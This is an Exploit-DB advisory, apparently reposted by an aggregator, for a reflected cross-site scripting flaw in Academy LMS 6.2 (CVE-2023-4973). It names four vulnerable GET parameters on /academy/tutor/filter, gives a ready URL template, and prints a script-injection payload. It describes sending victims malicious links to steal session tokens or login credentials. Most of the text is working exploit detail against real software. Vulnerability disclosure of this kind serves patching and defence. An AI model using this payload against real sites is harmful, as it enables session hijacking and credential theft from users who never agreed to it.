[webapps] Academy LMS 6.2 - Reflected XSS
2024-1-31 08:0:0 Author: www.exploit-db.com(查看原文) 阅读量:7 收藏

# Exploit Title: Academy LMS 6.2 - Reflected XSS
# Exploit Author: CraCkEr
# Date: 29/08/2023
# Vendor: Creativeitem
# Vendor Homepage: https://creativeitem.com/
# Software Link: https://demo.creativeitem.com/academy/
# Tested on: Windows 10 Pro
# Impact: Manipulate the content of the site
# CVE: CVE-2023-4973
# CWE: CWE-79 - CWE-74 - CWE-707


## Greetings

The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL , MoizSid09, indoushka
CryptoJob (Twitter) twitter.com/0x0CryptoJob


## Description

The attacker can send to victim a link containing a malicious URL in an email or instant message
can perform a wide variety of actions, such as stealing the victim's session token or login credentials


Path: /academy/tutor/filter

GET parameter 'searched_word' is vulnerable to XSS
GET parameter 'searched_tution_class_type[]' is vulnerable to XSS
GET parameter 'searched_price_type[]' is vulnerable to XSS
GET parameter 'searched_duration[]' is vulnerable to XSS

https://website/academy/tutor/filter?searched_word=[XSS]&searched_tution_class_type%5B%5D=[XSS]&price_min=1&price_max=9&searched_price_type%5B%5D=[XSS]&searched_duration%5B%5D=[XSS]


XSS Payload:

acoa5"><script>alert(1)</script>dyzs0


[-] Done
            

文章来源: https://www.exploit-db.com/exploits/51757
如有侵权请联系:admin#unsafe.sh